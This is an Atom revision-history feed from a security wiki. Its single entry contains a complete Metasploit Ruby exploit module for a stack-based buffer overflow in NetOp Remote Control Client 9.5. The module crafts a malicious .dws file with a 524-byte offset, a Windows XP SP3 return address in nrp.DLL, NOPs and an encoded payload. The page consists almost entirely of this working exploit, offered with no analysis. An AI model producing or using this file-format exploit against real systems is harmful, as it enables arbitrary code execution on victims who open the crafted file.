<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=NetOp_Remote_Control_Client_9.5%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>NetOp Remote Control Client 9.5緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=NetOp_Remote_Control_Client_9.5%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=NetOp_Remote_Control_Client_9.5%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-26T15:43:11Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=NetOp_Remote_Control_Client_9.5%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=3275&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=NetOp_Remote_Control_Client_9.5%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=3275&amp;oldid=prev"/>
		<updated>2021-05-26T01:02:19Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
##&lt;br /&gt;
# This file is part of the Metasploit Framework and may be subject to&lt;br /&gt;
# redistribution and commercial restrictions. Please see the Metasploit&lt;br /&gt;
# Framework web site for more information on licensing and terms of use.&lt;br /&gt;
#   http://metasploit.com/framework/&lt;br /&gt;
##&lt;br /&gt;
&lt;br /&gt;
require 'msf/core'&lt;br /&gt;
&lt;br /&gt;
class Metasploit3 &amp;lt; Msf::Exploit::Remote&lt;br /&gt;
 Rank = NormalRanking&lt;br /&gt;
&lt;br /&gt;
 include Msf::Exploit::FILEFORMAT&lt;br /&gt;
&lt;br /&gt;
 def initialize(info = {})&lt;br /&gt;
  super(update_info(info,&lt;br /&gt;
   'Name'           =&amp;gt; 'NetOp Remote Control Client 9.5 Buffer Overflow',&lt;br /&gt;
   'Description'    =&amp;gt; %q{&lt;br /&gt;
     This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5.&lt;br /&gt;
    When opening a .dws file containing a specially crafted string longer then 520&lt;br /&gt;
    characters will allow an attacker to execute arbitrary code.&lt;br /&gt;
   },&lt;br /&gt;
   'License'        =&amp;gt; MSF_LICENSE,&lt;br /&gt;
   'Author'         =&amp;gt;&lt;br /&gt;
    [&lt;br /&gt;
     'Ruben Alejandro &amp;quot;chap0&amp;quot;',&lt;br /&gt;
    ],&lt;br /&gt;
   'References'     =&amp;gt;&lt;br /&gt;
    [&lt;br /&gt;
     [ 'OSVDB', '72291' ],&lt;br /&gt;
     [ 'URL', 'http://www.exploit-db.com/exploits/17223/' ]&lt;br /&gt;
    ],&lt;br /&gt;
   'DefaultOptions' =&amp;gt;&lt;br /&gt;
    {&lt;br /&gt;
     'ExitFunction' =&amp;gt; 'process',&lt;br /&gt;
     'DisablePayloadHandler' =&amp;gt; 'true'&lt;br /&gt;
    },&lt;br /&gt;
   'Platform'       =&amp;gt; 'win',&lt;br /&gt;
   'Payload'        =&amp;gt;&lt;br /&gt;
    {&lt;br /&gt;
     'Space' =&amp;gt; 2000,&lt;br /&gt;
     'BadChars' =&amp;gt; &amp;quot;\x00\x0a\x0d&amp;quot;,&lt;br /&gt;
     'DisableNops' =&amp;gt; true,&lt;br /&gt;
     'StackAdjustment' =&amp;gt; -3500&lt;br /&gt;
    },&lt;br /&gt;
   'Targets'        =&amp;gt;&lt;br /&gt;
    [&lt;br /&gt;
     [ 'Windows XP SP3',&lt;br /&gt;
      {&lt;br /&gt;
       'Ret' =&amp;gt; 0x20d6c32c,  # push esp #  ret  - nrp.DLL&lt;br /&gt;
       'Offset' =&amp;gt; 524&lt;br /&gt;
      }&lt;br /&gt;
     ]&lt;br /&gt;
    ],&lt;br /&gt;
   'Privileged'     =&amp;gt; false,&lt;br /&gt;
   'DisclosureDate' =&amp;gt; 'Apr 28 2011',&lt;br /&gt;
   'DefaultTarget'  =&amp;gt; 0))&lt;br /&gt;
&lt;br /&gt;
  register_options(&lt;br /&gt;
   [&lt;br /&gt;
    OptString.new('FILENAME', [ true, 'The file name.', 'msf.dws']),&lt;br /&gt;
   ], self.class)&lt;br /&gt;
&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
 def exploit&lt;br /&gt;
  buffer =  rand_text(target['Offset'])&lt;br /&gt;
  buffer &amp;lt;&amp;lt; [target.ret].pack('V')&lt;br /&gt;
  buffer &amp;lt;&amp;lt; make_nops(30)&lt;br /&gt;
  buffer &amp;lt;&amp;lt; payload.encoded&lt;br /&gt;
&lt;br /&gt;
  file_create(buffer)&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
end&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>